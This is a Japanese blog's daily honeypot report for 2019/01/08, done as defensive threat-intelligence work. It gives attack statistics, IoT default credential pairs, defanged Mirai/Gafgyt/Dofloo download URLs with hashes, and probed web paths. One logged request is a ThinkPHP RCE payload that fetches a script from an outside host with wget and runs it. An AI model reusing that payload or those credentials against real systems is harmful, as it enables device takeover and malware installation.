cute_otter’s blog

ハニーポットの観察日記を付けています

トップ > ハニーポット観察日記 > ハニーポット観察日記(2019/01/08) 「GaniwやDoflooを観測」

ハニーポット観察日記(2019/01/08) 「GaniwやDoflooを観測」

ハニーポット観察日記

はじめに

こんにちは。cute_otterです。
今日も投稿が遅れてしまいました。すみません。

Cowrie

ハニーポット「Cowrie」で2019/01/08 (火) 00:00~23:59 UTC(運用57日目)に取得したログの簡易分析です。

概況

  • 集計期間 : 2019/01/08 (火) 00:00~23:59 UTC
  • 総イベント件数 : 627,008 件 (前日比 -663,176 件)
    • コマンド実行成功 : 261,401 件 (前日比 -316,157 件)
    • コマンド入力 : 210,228 件 (前日比 -237,119 件)
    • ファイルダウンロード成功 : 39,805 件 (前日比 -49,526 件)
    • 新しいコネクション : 28,953 件 (前日比 -6,389 件)
    • セッションクローズ : 28,949 件 (前日比 -6,392 件)
    • コマンド実行失敗 : 12,432 件 (前日比 -21,637 件)
    • ログイン成功 : 9,957 件 (前日比 -6,611 件)
    • 外部へのTCP/IPリクエストの送出 : 9,236 件 (前日比 -689 件)
    • Cowrieによってエミュレートされたアーキテクチャ : 5,666 件 (前日比 -6,398 件)
    • TTYログ取得終了 : 5,666 件 (前日比 -6,398 件)
    • クライアントのSSHバージョン : 4,639 件 (前日比 -207 件)
    • SSH鍵交換 : 4,632 件 (前日比 -191 件)
    • ファイルダウンロード失敗 : 4,084 件 (前日比 -3,737 件)
    • 外部へのTCP/IPデータの送出 : 943 件 (前日比 -498 件)
    • ログイン失敗 : 407 件 (前日比 -1,228 件)
    • ターミナルサイズ : 6 件 (前日比 +5 件)
    • クライアントの環境設定 : 4 件 (前日比 -4 件)
  • ログイン試行件数 : 10,364 件 (前日比 -7,839 件)
  • SSHコネクション件数 : 13,300 件 (前日比 -193 件)
  • Telnetコネクション件数 : 15,653 件 (前日比 -6,196 件)
  • ユニークIPアドレス件数 : 440 件 (前日比 -218 件)
  • アクセス元の国数 : 56 カ国 (前日比 -17 件)
  • TTY件数 : 5,666 件 (前日比 -6,398 件)

特徴

  • 総イベント件数が大幅に減少(半減)
    • 前日より66万3,000件ほど減少
  • ログイン試行件数が減少
    • 前日より7,800件ほど減少
  • Telnetコネクション件数が減少
    • 前日より6,200件ほど減少
  • 前日に引き続きアメリカからのアクセス件数が50万件を超えた
  • 普段あまりダウンロードされないGaniwやDoflooがダウンロードされた

ダッシュボード

ダッシュボードは以下の通りです。

ダッシュボード(2019/01/08)
ダッシュボード(2019/01/08)

国別のアクセス件数

国別のアクセス件数の変遷は以下の通りです。

国別のアクセス件数の変遷(2019/01/08)
国別のアクセス件数の変遷(2019/01/08)

続いて、国別のアクセス件数(上位20位)は以下の通りです。

順位 国名 件数 前日の順位 前日の件数 件数差 備考
1. United States 532,269 1. 617,785 -85,516 -
2. Italy 46,275 2. 419,002 -372,727 -
3. United Kingdom 18,609 3. 46,134 -27,525 -
4. Ireland 13,184 11. 13,850 -666 -
5. Singapore 4,958 14. 4,884 +74 -
6. Germany 3,442 17. 2,639 +803 -
7. Latvia 2,529 20. 1,003 +1,526 -
8. Russia 1,129 6. 21,617 -20,488 -
9. Vietnam 781 5. 21,960 -21,179 -
10. China 726 4. 28,190 -27,464 -
11. Romania 660 22. 802 -142 -
12. Unknown 539 69. 5 +534 識別不能
13. Netherlands 357 15. 2,780 -2,423 -
14. Brazil 202 24. 718 -516 -
15. France 195 10. 18,333 -18,138 -
16. Egypt 169 53. 41 +128 -
17. Republic of Korea 126 7. 19,956 -19,830 -
18. Taiwan 85 29. 403 -318 -
19. Switzerland 71 41. 130 -59 -
20. India 66 19. 1,010 -944 -
  • 1時と23時にイタリアからのアクセス件数が急増しました。また、20時にラトビアからのアクセス件数が急増しました。それ以外の時間帯のアクセス件数は落ち着いていました。
  • イタリアからのアクセス件数が前日より37万件ほど減少し、46,275件となりました。
    • イタリアからのアクセス件数のうち99.2%が1時と23時に集中していました。
  • アメリカからのアクセス件数が前日より8万件ほど減少し、532,269件となりました。
  • ラトビアからのアクセス件数が前日より1,500件ほど増加し、2,529件となりました。
    • ラトビアからのアクセスのうち63.7%が20時に集中していました。
イタリアからのアクセス件数の変遷

イタリアからのアクセス件数の変遷(2018/12/24~2019/01/08)は以下の通りです。

イタリアからのアクセス件数の変遷(2018/12/24~2019/01/08)
イタリアからのアクセス件数の変遷(2018/12/24~2019/01/08)

2018/12/26から件数が増加し始め、2018/12/28に、一時的に件数が減少しました。
しかし、2018/12/29から再び件数が増加し始め、2018/12/30~2019/01/01にかけて、毎日30万件以上のアクセスがありました。
2019/01/02には件数が大幅に減少し、430件となりましたが、2019/01/03から再び増加し始め、2019/01/04には327,194件となりました。
2019/01/05は8万件ほど減少しましたが、2019/01/06には525,601件となり、過去最大となりました。それ以降、件数は減少し、2019/01/09には46,275件となりました。

国別のログイン試行

国別のログイン試行の件数(上位20位)は以下の通りです。

順位 国名 件数 前日の順位 前日の件数 件数差 備考
1. United States 4,836 1. 6,063 -1,227 -
2. United Kingdom 2,276 3. 2,911 -635 -
3. Ireland 1,908 4. 1,909 -1 -
4. Italy 434 2. 3,848 -3,414 -
5. Russia 148 6. 457 -309 -
6. Germany 120 15. 64 +56 -
7. Singapore 117 14. 114 +3 -
8. China 94 5. 473 -379 -
9. Vietnam 67 9. 334 -267 -
10. Latvia 56 21. 20 +36 -
11. Netherlands 53 17. 47 +6 -
12. Republic of Korea 37 7. 364 -327 -
13. France 35 8. 334 -299 -
14. Taiwan 33 28. 10 +23 -
15. Romania 19 26. 12 +7 -
16. Egypt 14 40. 4 +10 -
17. Brazil 13 19. 34 -21 -
18. Poland 10 25. 12 -2 -
19. Indonesia 10 23. 16 -6 -
20. India 8 18. 40 -32 -
  • イタリアからのログイン試行件数が前日より3,400件ほど減少し、434件となりました
  • アメリカからのログイン試行件数が前日より1,200件ほど減少し、4,836件となりました。

ログイン試行で使用されたユーザ名とパスワード

ログイン試行の際に使用されたユーザ名とパスワードの組み合わせ(上位20位)は以下の通りです。

順位 ユーザ名 パスワード 件数 前日の順位 前日の件数 件数差 備考
1. admin admin 4,374 1. 4,610 -236 -
2. root (空欄) 347 7. 354 -7 -
3. root vizxv 277 8. 287 -10 Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照)
4. user user 246 9. 286 -40 -
5. root 666666 245 10. 265 -20 Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照)
6. root 88888888 210 2. 1,565 -1,355 -
7. root 888888 207 11. 253 -46 Zhejiang Dahua Technology製のDVRを狙ったものと思われる(参照)
8. root system 204 13. 211 -7 -
9. root pass 203 12. 229 -26 -
10. root 123456 192 14. 210 -18 -
11. root default 173 16. 192 -19 -
12. root 1234 172 22. 157 +15 -
13. root 12345 166 15. 195 -29 -
14. support support 159 17. 174 -15 -
15. root xc3511 156 20. 158 -2 HiSilicon Technologies製のIPカメラを狙ったものと思われる(参照)
16. root hi3518 154 19. 165 -11 Xiongmai製のDVRを狙ったものと思われる(参照)
17. admin 4321 145 21. 157 -12 -
18. admin admin1234 137 23. 156 -19 -
19. root admin 133 18. 168 -35 -
20. root jvbzd 116 24. 147 -31 Xiongmai製のDVRを狙ったものと思われる(参照)
  • admin/adminの組み合わせのほとんどがイギリスアイルランドからのログイン試行の際に使用されていました。
    • イギリスが2,192件(4,374件中)、アイルランドが1,906件(4,374件中)でした。

ダウンロードされたファイル

ダウンロードされたファイルは以下の通りです。

※VT : VirusTotal

順位 ダウンロード元 MD5 検出率(VT) 件数 備考
1. hxxp://198[.]98[.]62[.]237:80/bins/mirai[.]x86 4147e375f325878fe3c3962c3d4ac411 37/57 2,753 Mirai
2. hxxp://195[.]231[.]0[.]185:80/AB4g5/Josho[.]x86 aa496313be71695fda7e415999233aa9 19/55 405 Mirai
3. hxxp://159[.]65[.]190[.]9:80/Binarys/Owari[.]x86 e01733ef09a20256ada587920dc8de5f 24/59 346 Mirai
4. hxxp://209[.]141[.]43[.]15:80/bins/mirai[.]x86 256e4d3c013fe49c6166da2d3ba0c524 18/58 266 Mirai
5. hxxp://178[.]128[.]214[.]44:80/Kuso69/Akiru[.]x86 0f6fa2e22d9de3864e7d60ed6c0cb4b5 32/56 105 Gafgyt or Mirai
6. hxxp://46[.]183[.]218[.]243:80/33bi/Ares[.]x86 e68bd8a8712ce1788faa15c9813c00ab 21/59 43 Mirai
7. hxxp://206[.]189[.]188[.]228:80/bins/hoho[.]x86 2d46b69ac12c590f01eb65d7b987f365 28/59 29 Mirai
8. hxxp://167[.]99[.]229[.]112:80/8x868 a65849fe667dcc5eadd920d427785642 20/59 26 Gafgyt
9. hxxp://142[.]93[.]97[.]91:80/OwO/Tsunami[.]x86 ac779f5b95b56eda2e147128852c08a1 11/55 18 Mirai
10. hxxp://193[.]148[.]69[.]33:80/bins/telnet[.]x86 f81cb52b13c0ad74247db720ffe5fa36 22/60 14 Mirai
11. hxxp://138[.]197[.]98[.]242:80/Binarys/Owari[.]x86 30eaf115919371ec845d1f09fc40765c 20/58 10 Mirai
12. hxxp://165[.]227[.]104[.]136:80/bins/kowai[.]x86 8d3306819d1382f4cdf64a146aafa0eb 26/58 6 Mirai
13. hxxp://209[.]97[.]185[.]168:80/bins/kirai[.]x86 3906a2f9b3192664762e3f6eb84f4c18 22/58 6 Mirai
14. hxxp://bot[.]sunless[.]network:80/sunless[.]x86 06a8ac27ca066c417459186e4b3abf0a 12/59 5 Mirai
15. hxxp://139[.]59[.]25[.]145:80/bins/sora[.]x86 e4ae3f23bbdbcb67b52be4616ffe280b 21/57 5 Mirai
16. hxxp://194[.]36[.]173[.]4:80/vi/x86[.]bushido 236cc078eb84e9e14f1112a52e74abc9 34/58 3 Mirai
17. hxxp://217[.]61[.]105[.]126:80/shiro[.]x86 f06a94f50fb5313850f776bc8d2f73f4 9/58 2 Mirai or Gafgyt
18. hxxp://167[.]99[.]219[.]142:80/bins/dark[.]x86 5f579b8d2ad96c3219865f0a30cf3178 21/58 2 Mirai
19. hxxp://35[.]235[.]102[.]123:80/bins/telnet[.]x86 12747042919cf473e147c0201773bed9 22/59 2 Mirai
20. hxxp://58[.]218[.]205[.]250:8989/NET86 ba1cbd4a1b748e36c0ed1d907603cfab 37/59 2 Ganiw
21. hxxp://217[.]61[.]105[.]126:80/shiro[.]x86 88bf4c4b7b75ceaf161059419ca15c48 10/60 2 Mirai or Gafgyt
22. hxxp://58[.]218[.]205[.]250:8989/TFmips 520e14c83f6063d338072cacf791d51a 37/58 1 Dofloo
23. hxxp://58[.]218[.]205[.]250:8989/TFwrt c10f8bedf317ac3aedef081abdbec46b 35/57 1 Dofloo
24. hxxp://58[.]218[.]205[.]250:8989/syn[.]sh 644a81ead1053eae62ff87f52015b69f 12/58 1 ダウンローダ
25. hxxp://58[.]218[.]205[.]250:8989/TFNET3[.]0 47108cede9f88417bf4d1194a1a6cfe7 38/59 1 Dofloo
  • Mirai(亜種含む)やGafgyt(亜種含む)以外にGaniwやDoflooと思われるマルウェアがダウンロードされていました。

IRCボット

前日観測したIRCボットと思われるファイルを再び観測しました。
Raspberry Piのデフォルトのユーザ名/パスワードであるpi/raspberryを利用してSSHでログイン後、以下のIRCボットと思われるファイルをSCPで転送し、一旦接続を切断。
その後再度ログインし、IRCボットと思われるファイルを実行しようとしていました。

MD5 : 742f247c9ff393f8daf2e1609f0d9506

Cowrieで取得したログの簡易分析は以上です。

WOWHoneypot

続いて、ハニーポット「WOWHoneypot」で2019/01/08 (火) 00:00~23:59 UTC(運用5日目)に取得したログの簡易分析です。

概況

  • 集計期間 : 2019/01/08 (火) 00:00~23:59 UTC
  • 総アクセス件数 : 870 件 (前日比 +465 件)
  • ユニークIPアドレス件数 : 33 件 (前日比 +6 件)
  • アクセス元の国数 : 16 カ国 (前日比 +1 件)

国別のアクセス件数

国別のアクセス件数(上位5位)は以下の通りです。

順位 国名 件数 前日の順位 前日の件数 件数差 備考
1. China 502 1. 379 +123 -
2. Republic of Korea 349 - 0 +349 -
3. Brazil 4 2. 5 -1 -
4. United States 3 3. 3 +-0 -
5. Japan 1 - 0 +1 -
  • 韓国からのアクセス件数が大幅に増加しました。

メソッド

メソッドの件数は以下の通りです。

順位 メソッド 件数 前日の順位 前日の件数 件数差 備考
1. POST 467 2. 157 +310 -
2. GET 394 1. 244 +150 -
3. CONNECT 6 4. 1 +5 -
4. PROPFIND 3 3. 2 +1 -

HTTPバージョン

HTTPバージョンの件数は以下の通りです。

順位 HTTPバージョン 件数 前日の順位 前日の件数 件数差 備考
1. HTTP/1.1 867 1. 404 +463 -
2. HTTP/1.0 3 2. 1 +2 -

アクセス先

アクセス先(上位10位+気になったもの)は以下の通りです。

順位 アクセス先 件数 前日の順位 前日の件数 件数差 備考
1. GET /manager/html HTTP/1.1 29 2. 10 +19 Tomcatの管理ページに対するログイン試行
2. GET / HTTP/1.1 16 1. 23 -7 トップページへのアクセス
3. POST /qq.php HTTP/1.1 9 3. 5 +4 WebShellの探査
4. POST /1.php HTTP/1.1 8 - 0 +8 WebShellの探査
5. POST /confg.php HTTP/1.1 8 - 0 +8 WebShellの探査
6. GET /shell.php HTTP/1.1 6 4. 4 +2 WebShellの探査
7. GET /cmd.php HTTP/1.1 6 12. 3 +3 WebShellの探査
8. POST /conflg.php HTTP/1.1 6 6. 4 +2 WebShellの探査
9. POST /test.php HTTP/1.1 6 93. 2 +4 WebShellの探査
10. GET /phpMyAdmin/index.php HTTP/1.1 6 121. 2 +4 phpMyAdminの探査
... ... ... ... ... ... ...
27. CONNECT 133[.]130 [.] 126 [.] 119:43 HTTP/1.1 3 179. 1 +2 オープンプロキシの探査
28. PROPFIND / HTTP/1.1 3 15. 2 +1 Microsoft IIS 6.0の脆弱性CVE-2017-7269を狙った攻撃
... ... ... ... ... ... ...
312. GET hxxp://www[.]123cha[.]com HTTP/1.1 1 - 0 +1 オープンプロキシの探査
313. CONNECT www[.]baidu[.]com HTTP/1.1 1 - 0 +1 オープンプロキシの探査
314. GET hxxp://api[.]ipify[.]org/ HTTP/1.1 1 - 0 +1 オープンプロキシの探査
315. CONNECT cn[.]bing[.]com:443 HTTP/1.1 1 - 0 +1 オープンプロキシの探査
316. GET hxxp://www[.]123cha[.]com/ HTTP/1.1 1 - 0 +1 オープンプロキシの探査
317. GET hxxp://www[.]ip[.]cn/ HTTP/1.1 1 - 0 +1 オープンプロキシの探査
318. CONNECT www[.]baidu[.]com:443 HTTP/1.1 1 - 0 +1 オープンプロキシの探査
319. GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20hxxp://167[.]99[.]219[.]142/ex[.]sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1 1 - 0 +1 ThinkPHPフレームワーク脆弱性(RCE)を狙った攻撃(参照) User-AgentはSefaでした。
  • 前日から不正中継とみられるアクセスが増加しています。

WOWHoneypotで取得したログの簡易分析は以上です。